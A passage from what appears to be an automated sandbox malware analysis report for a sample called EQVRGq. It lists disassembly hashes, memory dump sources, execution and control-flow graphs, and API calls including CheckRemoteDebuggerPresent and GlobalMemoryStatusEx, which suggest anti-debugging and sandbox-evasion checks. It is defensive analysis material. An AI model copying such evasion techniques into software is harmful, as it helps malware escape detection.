                                                                                                                    • Opcode ID: a36495252c9c0088728a685de49748a2d326ea94ada7f5135b31deb9f86f7f37
                                                                                                                    • Instruction ID: e26cc72e979df437f868bd042bbcd118f06a85ea0be5feca5665e6e4627ac449
                                                                                                                    • Opcode Fuzzy Hash: a36495252c9c0088728a685de49748a2d326ea94ada7f5135b31deb9f86f7f37
                                                                                                                    • Instruction Fuzzy Hash: 701137B19002499FCB10DFAAC844BDFBFF5EF88320F148419E559A7250C775A544CFA4
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ResumeThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 947044025-0
                                                                                                                    • Opcode ID: 4e99c88bfd24896299c7115fecf4bf9d02a39b43023e36bfdbad1078e8e486d5
                                                                                                                    • Instruction ID: 1d883c68cbedd627e1ab518b10bd0aad8687a434ae6a39e9baef48d617dba3f9
                                                                                                                    • Opcode Fuzzy Hash: 4e99c88bfd24896299c7115fecf4bf9d02a39b43023e36bfdbad1078e8e486d5
                                                                                                                    • Instruction Fuzzy Hash: 741128B1D002488FCB20DFAAC8457DEFFF4EB89324F248429D459A7250CB75A984CFA5
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ResumeThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 947044025-0
                                                                                                                    • Opcode ID: b79be245554156ba91ffba95635ae084833a5d60888011873b0dd556e98a1568
                                                                                                                    • Instruction ID: 60ea1a775f07e5439378b095191b5d9df6a8948b63bf0ee785adaa1fee1a856d
                                                                                                                    • Opcode Fuzzy Hash: b79be245554156ba91ffba95635ae084833a5d60888011873b0dd556e98a1568
                                                                                                                    • Instruction Fuzzy Hash: 8B1136B1D002488FCB20DFAAC4457DEFBF4EB89324F248429D459A7250CB79A944CFA4
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06C1B74D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: e94c9ef2aa84c31bf9025666a4d8a7fbe8e50a58a19c9ce1c8ef904296b9e335
                                                                                                                    • Instruction ID: a87cfe87643abb6f88fb801945025b3e53af0ea1fa9281a78c71a08c08294a22
                                                                                                                    • Opcode Fuzzy Hash: e94c9ef2aa84c31bf9025666a4d8a7fbe8e50a58a19c9ce1c8ef904296b9e335
                                                                                                                    • Instruction Fuzzy Hash: 9011F5B5800349DFDB10DF9AD989BDEBBF8EB49310F10841AE958A7210C375A944CFA5
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06C1B74D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: 2eaf9408fe0e091d82ca59d8df6a146e5ed930ba3bada6c211372a7fd22b01e1
                                                                                                                    • Instruction ID: 8d08420f6ee36d39f7cc9ff7b7cb1c5cf80f199700df032eb9c2f7a9ed2685db
                                                                                                                    • Opcode Fuzzy Hash: 2eaf9408fe0e091d82ca59d8df6a146e5ed930ba3bada6c211372a7fd22b01e1
                                                                                                                    • Instruction Fuzzy Hash: 1A11F2B58003499FDB10DF9AC888BDEBBF8EB48320F10845AE958A7210C375A944CFA5
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00C0AF5E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1782337609.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_c00000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: 2db2ba97de8b1f5ce1b29c1b08fe0cf9e65de914d8500b45b59a20bbd03daafa
                                                                                                                    • Instruction ID: 421f3e5af2042d0f76a6f3615a45a811c48a83810076b42afdf17e4ce9b71f1b
                                                                                                                    • Opcode Fuzzy Hash: 2db2ba97de8b1f5ce1b29c1b08fe0cf9e65de914d8500b45b59a20bbd03daafa
                                                                                                                    • Instruction Fuzzy Hash: B011F2B5C003498FCB10DF9AC444ADEFBF4EF88324F14856AD869A7250C379A645CFA5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1781602641.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_a7d000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 30d29bd2d1cf031917b3d28a22d74c4e947fb35df210b162272ba7a989188413
                                                                                                                    • Instruction ID: 07762ee4aec9cbdb267b4059c080900b1027d7b5cefd9ddd9f88d2136d042552
                                                                                                                    • Opcode Fuzzy Hash: 30d29bd2d1cf031917b3d28a22d74c4e947fb35df210b162272ba7a989188413
                                                                                                                    • Instruction Fuzzy Hash: 6D210372500204EFDB05DF14DAC4B26BF75FF98324F20C569E90D4B256C336E856CAA2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1781728264.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_a8d000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 87efc13375e9354a71a2b9f6152e675a76f9b8a3790221ac4086120649518165
                                                                                                                    • Instruction ID: c009735b2b3a2b4defd49d65ef21df5be7b59cfd1d6ea76976d85d59c529a045
                                                                                                                    • Opcode Fuzzy Hash: 87efc13375e9354a71a2b9f6152e675a76f9b8a3790221ac4086120649518165
                                                                                                                    • Instruction Fuzzy Hash: 8D21F271604204EFDB14EF14D984B26BFB5FB84314F20C569D84A4B296C33AD847CB61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1781728264.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_a8d000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6f5a7849b1dba08bf15f6a9a5ba62fcde59cb2a8943059b322a7d412eb94772a
                                                                                                                    • Instruction ID: 441214bbe0e7c67db17f94f1aadba86a23ce823b040fd6f8f95f80f7e4156b2b
                                                                                                                    • Opcode Fuzzy Hash: 6f5a7849b1dba08bf15f6a9a5ba62fcde59cb2a8943059b322a7d412eb94772a
                                                                                                                    • Instruction Fuzzy Hash: 06210471504204EFDB05EF14D9C4B66BBB5FB84314F20C66DE8094B2D6D336D846CB61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1781728264.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_a8d000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7b713659997c6e6039201c49ae0f132c4f74bec09d3433e4f5633cf9b2cd4274
                                                                                                                    • Instruction ID: 46df53e9b1ab824c79f2ffcefff6fb7648d23394e9ee400323ddeb7a2f4b7d5e
                                                                                                                    • Opcode Fuzzy Hash: 7b713659997c6e6039201c49ae0f132c4f74bec09d3433e4f5633cf9b2cd4274
                                                                                                                    • Instruction Fuzzy Hash: 1C2192755083809FDB02DF14D994711BF71EB56314F28C5DAD8498F2A7C33A980ACB62
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1781602641.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_a7d000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                    • Instruction ID: 62417d4936cf678db72456c9e69d3dddae97bbc8acdb2ca3dbb3f0624a45ee71
                                                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                    • Instruction Fuzzy Hash: 0511D076504280DFDB16CF14D9C4B16BF72FF94324F24C6A9D9090B656C33AE85ACBA2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1781728264.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_a8d000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                    • Instruction ID: 5ca1aa3d6940522aea9652a2006bb7819b6d76c3368a18da775234ad60579d6a
                                                                                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                    • Instruction Fuzzy Hash: 3E11BB75504280DFCB02DF14C5C4B55BBA1FB84314F24C6AAD8494B296C33AD81ACB61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1781602641.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_a7d000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5da5f66a0786cc42a24bac2f5eee9b0489459f4368cf835d232b45986d467ceb
                                                                                                                    • Instruction ID: c45dbf665726c0b4b519c8d781c34041d8390b72a4ea922f374cd15360b10a58
                                                                                                                    • Opcode Fuzzy Hash: 5da5f66a0786cc42a24bac2f5eee9b0489459f4368cf835d232b45986d467ceb
                                                                                                                    • Instruction Fuzzy Hash: 1F01A2711083409EE7149B2ACD84B67BFB8EF91324F18C92AED0D4A286C379D840C6B1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1781602641.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_a7d000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9cbe92703610e63af39fbeec545ad0fe7b8ae58b146c5dc5d67a5acdaaa4feb7
                                                                                                                    • Instruction ID: 1228283027665cdb31a188f93f2f4463d0025620874ea59af0ab0fef52f9edd0
                                                                                                                    • Opcode Fuzzy Hash: 9cbe92703610e63af39fbeec545ad0fe7b8ae58b146c5dc5d67a5acdaaa4feb7
                                                                                                                    • Instruction Fuzzy Hash: E2F062714043449EE7148B1ADC84B62FFA8EF91724F18C55AED4C4E286C3799844CAB1

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:13.3%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:29
                                                                                                                    Total number of Limit Nodes:6
                                                                                                                    execution_graph 23903 2e47050 23904 2e47094 CheckRemoteDebuggerPresent 23903->23904 23905 2e470d6 23904->23905 23906 2e40848 23907 2e4084e 23906->23907 23908 2e4091b 23907->23908 23910 2e41330 23907->23910 23911 2e41333 23910->23911 23912 2e4145a 23911->23912 23914 2e48210 23911->23914 23912->23907 23915 2e4821a 23914->23915 23917 2e4825c 23915->23917 23922 6a2f988 23915->23922 23926 6a2f979 23915->23926 23916 2e4822d 23930 2e4f160 23916->23930 23934 2e4f150 23916->23934 23917->23911 23923 6a2f99d 23922->23923 23924 6a2fbb2 23923->23924 23925 6a2fbc7 GlobalMemoryStatusEx GlobalMemoryStatusEx 23923->23925 23924->23916 23925->23923 23927 6a2f99d 23926->23927 23928 6a2fbb2 23927->23928 23929 6a2fbc7 GlobalMemoryStatusEx GlobalMemoryStatusEx 23927->23929 23928->23916 23929->23927 23932 2e4f17a 23930->23932 23931 2e4f3c1 23931->23917 23932->23931 23933 6a2fbc7 GlobalMemoryStatusEx GlobalMemoryStatusEx 23932->23933 23933->23932 23936 2e4f17a 23934->23936 23935 2e4f3c1 23935->23917 23936->23935 23937 6a2fbc7 GlobalMemoryStatusEx GlobalMemoryStatusEx 23936->23937 23937->23936

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 127 6a23070-6a23091 128 6a23093-6a23096 127->128 129 6a23837-6a2383a 128->129 130 6a2309c-6a230bb 128->130 131 6a23860-6a23862 129->131 132 6a2383c-6a2385b 129->132 140 6a230d4-6a230de 130->140 141 6a230bd-6a230c0 130->141 133 6a23864 131->133 134 6a23869-6a2386c 131->134 132->131 133->134 134->128 137 6a23872-6a2387b 134->137 144 6a230e4-6a230f3 140->144 141->140 142 6a230c2-6a230d2 141->142 142->144 253 6a230f5 call 6a23890 144->253 254 6a230f5 call 6a23888 144->254 146 6a230fa-6a230ff 147 6a23101-6a23107 146->147 148 6a2310c-6a233e9 146->148 147->137 169 6a23829-6a23836 148->169 170 6a233ef-6a2349e 148->170 179 6a234a0-6a234c5 170->179 180 6a234c7 170->180 182 6a234d0-6a234e3 179->182 180->182 184 6a23810-6a2381c 182->184 185 6a234e9-6a2350b 182->185 184->170 186 6a23822 184->186 185->184 188 6a23511-6a2351b 185->188 186->169 188->184 189 6a23521-6a2352c 188->189 189->184 190 6a23532-6a23608 189->190 202 6a23616-6a23646 190->202 203 6a2360a-6a2360c 190->203 207 6a23654-6a23660 202->207 208 6a23648-6a2364a 202->208 203->202 209 6a23662-6a23666 207->209 210 6a236c0-6a236c4 207->210 208->207 209->210 213 6a23668-6a23692 209->213 211 6a23801-6a2380a 210->211 212 6a236ca-6a23706 210->212 211->184 211->190 224 6a23714-6a23722 212->224 225 6a23708-6a2370a 212->225 220 6a236a0-6a236bd 213->220 221 6a23694-6a23696 213->221 220->210 221->220 227 6a23724-6a2372f 224->227 228 6a23739-6a23744 224->228 225->224 227->228 231 6a23731 227->231 232 6a23746-6a2374c 228->232 233 6a2375c-6a2376d 228->233 231->228 234 6a23750-6a23752 232->234 235 6a2374e 232->235 237 6a23785-6a23791 233->237 238 6a2376f-6a23775 233->238 234->233 235->233 242 6a23793-6a23799 237->242 243 6a237a9-6a237fa 237->243 239 6a23777 238->239 240 6a23779-6a2377b 238->240 239->237 240->237 244 6a2379b 242->244 245 6a2379d-6a2379f 242->245 243->211 244->243 245->243 253->146 254->146
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2392861976
                                                                                                                    • Opcode ID: 42cc793a9c096cd4666ed1ffaaea098fb7559f95de54b67dfac20c7a6e9e97ed
                                                                                                                    • Instruction ID: 134c334749fe0cb838c4004e8ab81a7e113fc8b96f71d5de3c3554df13b53517
                                                                                                                    • Opcode Fuzzy Hash: 42cc793a9c096cd4666ed1ffaaea098fb7559f95de54b67dfac20c7a6e9e97ed
                                                                                                                    • Instruction Fuzzy Hash: 72322E31E5061ACFDB14EF79C85459DB7B6FFCA300F20C6A9D409AB214EB34A985CB91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 848 6a27da0-6a27dbe 849 6a27dc0-6a27dc3 848->849 850 6a27de4-6a27de7 849->850 851 6a27dc5-6a27ddf 849->851 852 6a27de9-6a27df7 850->852 853 6a27dfe-6a27e01 850->853 851->850 863 6a27e46-6a27e5c 852->863 864 6a27df9 852->864 854 6a27e03-6a27e0d 853->854 855 6a27e0e-6a27e11 853->855 857 6a27e13-6a27e2f 855->857 858 6a27e34-6a27e36 855->858 857->858 860 6a27e38 858->860 861 6a27e3d-6a27e40 858->861 860->861 861->849 861->863 868 6a27e62-6a27e6b 863->868 869 6a28077-6a28081 863->869 864->853 870 6a28082-6a280b7 868->870 871 6a27e71-6a27e8e 868->871 880 6a280b9-6a280bc 870->880 876 6a28064-6a28071 871->876 877 6a27e94-6a27ebc 871->877 876->868 876->869 877->876 888 6a27ec2-6a27ecb 877->888 881 6a280c2-6a280ce 880->881 882 6a28169-6a2816c 880->882 889 6a280d9-6a280db 881->889 883 6a2816e-6a2818a 882->883 884 6a2818f-6a28192 882->884 883->884 886 6a283c7-6a283c9 884->886 887 6a28198-6a281a7 884->887 892 6a283d0-6a283d3 886->892 893 6a283cb 886->893 904 6a281c6-6a2820a 887->904 905 6a281a9-6a281c4 887->905 888->870 891 6a27ed1-6a27eed 888->891 894 6a280f3-6a280f7 889->894 895 6a280dd-6a280e3 889->895 909 6a28052-6a2805e 891->909 910 6a27ef3-6a27f1d 891->910 892->880 899 6a283d9-6a283e2 892->899 893->892 896 6a28105 894->896 897 6a280f9-6a28103 894->897 900 6a280e7-6a280e9 895->900 901 6a280e5 895->901 902 6a2810a-6a2810c 896->902 897->902 900->894 901->894 907 6a28123-6a2815c 902->907 908 6a2810e-6a28111 902->908 913 6a28210-6a28221 904->913 914 6a2839b-6a283b1 904->914 905->904 907->887 932 6a2815e-6a28168 907->932 908->899 909->876 909->888 927 6a27f23-6a27f4b 910->927 928 6a28048-6a2804d 910->928 922 6a28386-6a28395 913->922 923 6a28227-6a28244 913->923 914->886 922->913 922->914 923->922 936 6a2824a-6a28340 call 6a265c0 923->936 927->928 938 6a27f51-6a27f7f 927->938 928->909 983 6a28342-6a2834c 936->983 984 6a2834e 936->984 938->928 944 6a27f85-6a27f8e 938->944 944->928 946 6a27f94-6a27fc6 944->946 953 6a27fd1-6a27fed 946->953 954 6a27fc8-6a27fcc 946->954 953->909 956 6a27fef-6a28046 call 6a265c0 953->956 954->928 955 6a27fce 954->955 955->953 956->909 985 6a28353-6a28355 983->985 984->985 985->922 986 6a28357-6a2835c 985->986 987 6a2836a 986->987 988 6a2835e-6a28368 986->988 989 6a2836f-6a28371 987->989 988->989 989->922 990 6a28373-6a2837f 989->990 990->922
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q
                                                                                                                    • API String ID: 0-355816377
                                                                                                                    • Opcode ID: 977a764f18f416a8cb9476be55d2fa5486a4f1913ab85a3ae976bb366595c825
                                                                                                                    • Instruction ID: dd3c0b81bed2c2c4dc2dd4806e7eb53fbe99a4f122ae5d4f285ffd81261fc00b
                                                                                                                    • Opcode Fuzzy Hash: 977a764f18f416a8cb9476be55d2fa5486a4f1913ab85a3ae976bb366595c825
                                                                                                                    • Instruction Fuzzy Hash: F9029F30B402268FDB54EF68D55466EB7E2FF84304F148569E40AEB394DB39EC86CB91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1308 6a255a0-6a255bd 1309 6a255bf-6a255c2 1308->1309 1310 6a255d6-6a255d9 1309->1310 1311 6a255c4-6a255cb 1309->1311 1314 6a255f2-6a255f5 1310->1314 1315 6a255db-6a255ed 1310->1315 1312 6a25780-6a2578f 1311->1312 1313 6a255d1 1311->1313 1313->1310 1316 6a25607-6a2560a 1314->1316 1317 6a255f7-6a25600 1314->1317 1315->1314 1321 6a25618-6a2561b 1316->1321 1322 6a2560c-6a25613 1316->1322 1319 6a25602 1317->1319 1320 6a25674-6a2568a 1317->1320 1319->1316 1332 6a2568f-6a25692 1320->1332 1323 6a25623-6a25626 1321->1323 1324 6a2561d-6a2561e 1321->1324 1322->1321 1325 6a25635-6a25638 1323->1325 1326 6a25628-6a2562e 1323->1326 1324->1323 1330 6a25662-6a25665 1325->1330 1331 6a2563a-6a2565d 1325->1331 1328 6a25630 1326->1328 1329 6a25667-6a2566a 1326->1329 1328->1325 1333 6a2566f-6a25672 1329->1333 1330->1329 1330->1333 1331->1330 1334 6a256c4-6a256c7 1332->1334 1335 6a25694-6a25697 1332->1335 1333->1320 1333->1332 1338 6a256d3-6a256d6 1334->1338 1339 6a256c9-6a256d2 1334->1339 1336 6a25790-6a257bb 1335->1336 1337 6a2569d-6a256a5 1335->1337 1350 6a257c5-6a257c8 1336->1350 1337->1336 1341 6a256ab-6a256b5 1337->1341 1338->1317 1342 6a256dc-6a256df 1338->1342 1341->1336 1344 6a256bb-6a256bf 1341->1344 1345 6a256e1-6a256fa 1342->1345 1346 6a256ff-6a25702 1342->1346 1344->1334 1345->1346 1348 6a25704-6a25707 1346->1348 1349 6a2575a-6a25763 1346->1349 1353 6a25709-6a2570b 1348->1353 1354 6a2570e-6a25711 1348->1354 1349->1335 1352 6a25769 1349->1352 1355 6a257e0-6a257e3 1350->1355 1356 6a257ca-6a257db 1350->1356 1357 6a2576e-6a25770 1352->1357 1353->1354 1358 6a25713-6a2571f 1354->1358 1359 6a25724-6a25727 1354->1359 1362 6a257f7-6a257fa 1355->1362 1363 6a257e5-6a257ec 1355->1363 1356->1355 1364 6a25772 1357->1364 1365 6a25777-6a2577a 1357->1365 1358->1359 1360 6a25730-6a25733 1359->1360 1361 6a25729-6a2572b 1359->1361 1367 6a25755-6a25758 1360->1367 1368 6a25735-6a25750 1360->1368 1361->1360 1372 6a2581c-6a2581f 1362->1372 1373 6a257fc-6a25800 1362->1373 1370 6a257f2 1363->1370 1371 6a258ae-6a258b5 1363->1371 1364->1365 1365->1309 1365->1312 1367->1349 1367->1357 1368->1367 1370->1362 1376 6a25841-6a25844 1372->1376 1377 6a25821-6a25825 1372->1377 1374 6a258b6-6a258f4 1373->1374 1375 6a25806-6a2580e 1373->1375 1396 6a258f6-6a258f9 1374->1396 1375->1374 1381 6a25814-6a25817 1375->1381 1378 6a25846-6a2584d 1376->1378 1379 6a2584e-6a25851 1376->1379 1377->1374 1382 6a2582b-6a25833 1377->1382 1384 6a25853-6a25857 1379->1384 1385 6a2586b-6a2586e 1379->1385 1381->1372 1382->1374 1383 6a25839-6a2583c 1382->1383 1383->1376 1384->1374 1387 6a25859-6a25861 1384->1387 1388 6a25870-6a2587a 1385->1388 1389 6a2587f-6a25882 1385->1389 1387->1374 1390 6a25863-6a25866 1387->1390 1388->1389 1392 6a25884-6a25888 1389->1392 1393 6a2589c-6a2589e 1389->1393 1390->1385 1392->1374 1398 6a2588a-6a25892 1392->1398 1394 6a258a0 1393->1394 1395 6a258a5-6a258a8 1393->1395 1394->1395 1395->1350 1395->1371 1399 6a25917-6a2591a 1396->1399 1400 6a258fb-6a2590c 1396->1400 1398->1374 1401 6a25894-6a25897 1398->1401 1402 6a25c03-6a25c06 1399->1402 1403 6a25920-6a25ab4 1399->1403 1408 6a25912 1400->1408 1409 6a25ca0-6a25cb1 1400->1409 1401->1393 1405 6a25c14-6a25c17 1402->1405 1406 6a25c08-6a25c0f 1402->1406 1458 6a25aba-6a25ac1 1403->1458 1459 6a25bed-6a25c00 1403->1459 1405->1403 1410 6a25c1d-6a25c20 1405->1410 1406->1405 1408->1399 1409->1406 1418 6a25cb7 1409->1418 1411 6a25c22-6a25c33 1410->1411 1412 6a25c3a-6a25c3d 1410->1412 1411->1406 1420 6a25c35 1411->1420 1414 6a25c57-6a25c5a 1412->1414 1415 6a25c3f-6a25c50 1412->1415 1414->1403 1419 6a25c60-6a25c63 1414->1419 1415->1406 1426 6a25c52 1415->1426 1423 6a25cbc-6a25cbf 1418->1423 1424 6a25c65-6a25c6a 1419->1424 1425 6a25c6d-6a25c70 1419->1425 1420->1412 1427 6a25cc1-6a25cd4 1423->1427 1428 6a25cd7-6a25cd9 1423->1428 1424->1425 1429 6a25c72-6a25c79 1425->1429 1430 6a25c7e-6a25c81 1425->1430 1426->1414 1432 6a25ce0-6a25ce3 1428->1432 1433 6a25cdb 1428->1433 1429->1430 1434 6a25c83-6a25c94 1430->1434 1435 6a25c9b-6a25c9e 1430->1435 1432->1396 1437 6a25ce9-6a25cf2 1432->1437 1433->1432 1434->1427 1440 6a25c96 1434->1440 1435->1409 1435->1423 1440->1435 1460 6a25ac7-6a25aea 1458->1460 1461 6a25b75-6a25b7c 1458->1461 1470 6a25af2-6a25afa 1460->1470 1461->1459 1462 6a25b7e-6a25bb1 1461->1462 1474 6a25bb3 1462->1474 1475 6a25bb6-6a25be3 1462->1475 1471 6a25aff-6a25b40 1470->1471 1472 6a25afc 1470->1472 1483 6a25b42-6a25b53 1471->1483 1484 6a25b58-6a25b69 1471->1484 1472->1471 1474->1475 1475->1437 1483->1437 1484->1437
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $
                                                                                                                    • API String ID: 0-3993045852
                                                                                                                    • Opcode ID: d6a49884238ceb0988cc6999f9f41ef5cdd91cc13695993bf4a9353f52ac2ffc
                                                                                                                    • Instruction ID: ceb6f7a9c5ab94156a14065de13e622571916d4dc75c7a4dbcd4af81de043d1a
                                                                                                                    • Opcode Fuzzy Hash: d6a49884238ceb0988cc6999f9f41ef5cdd91cc13695993bf4a9353f52ac2ffc
                                                                                                                    • Instruction Fuzzy Hash: 0422BE35E402268FDF64EBA9C4846AEBBB2FF85324F148469D905EF344DA35DC41CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6baff28044248444d2c07773b2bd1a3fb5cc28fb66cb313a410da73de893b340
                                                                                                                    • Instruction ID: b3f79f6751d7dec3f18a3fb8a2e8b2f21adbbd0993e26966f35e8d33a3fcba82
                                                                                                                    • Opcode Fuzzy Hash: 6baff28044248444d2c07773b2bd1a3fb5cc28fb66cb313a410da73de893b340
                                                                                                                    • Instruction Fuzzy Hash: 71925334A40225CFDB64EB68C184B5DBBF2FB85314F5484A9D44AAF361DB39ED81CB90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
